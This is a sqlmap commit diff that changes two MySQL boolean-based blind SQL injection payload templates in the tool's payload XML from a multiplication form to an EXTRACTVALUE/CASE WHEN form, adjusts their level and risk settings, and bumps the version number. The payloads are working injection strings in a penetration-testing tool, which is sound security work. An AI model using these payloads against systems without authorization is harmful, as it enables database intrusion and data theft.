Skip to content

Commit a13c1f2

Browse files
stamparmstamparm
committed
Implements #5585 
1 parent f176266 commit a13c1f2

File tree

2 files changed

+14
-14
lines changed

2 files changed

+14
-14
lines changed

data/xml/payloads/boolean_blind.xml

Lines changed: 13 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -484,37 +484,37 @@ Tag: <test>
484484
</test>
485485

486486
<test>
487-
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
487+
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
488488
<stype>1</stype>
489-
<level>5</level>
490-
<risk>1</risk>
489+
<level>1</level>
490+
<risk>5</risk>
491491
<clause>1,2,3,8</clause>
492492
<where>1</where>
493-
<vector>AND ([INFERENCE])*[RANDNUM]</vector>
493+
<vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
494494
<request>
495-
<payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
495+
<payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
496496
</request>
497497
<response>
498-
<comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
498+
<comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
499499
</response>
500500
<details>
501501
<dbms>MySQL</dbms>
502502
</details>
503503
</test>
504504

505505
<test>
506-
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
506+
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
507507
<stype>1</stype>
508-
<level>5</level>
509-
<risk>3</risk>
510-
<clause>1,2,3</clause>
508+
<level>3</level>
509+
<risk>5</risk>
510+
<clause>1,2,3,8</clause>
511511
<where>2</where>
512-
<vector>OR ([INFERENCE])*[RANDNUM]</vector>
512+
<vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
513513
<request>
514-
<payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
514+
<payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
515515
</request>
516516
<response>
517-
<comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
517+
<comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
518518
</response>
519519
<details>
520520
<dbms>MySQL</dbms>

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@
2020
from thirdparty.six import unichr as _unichr
2121

2222
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
23-
VERSION = "1.7.12.7"
23+
VERSION = "1.7.12.8"
2424
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2525
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2626
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

0 commit comments

Comments
 (0)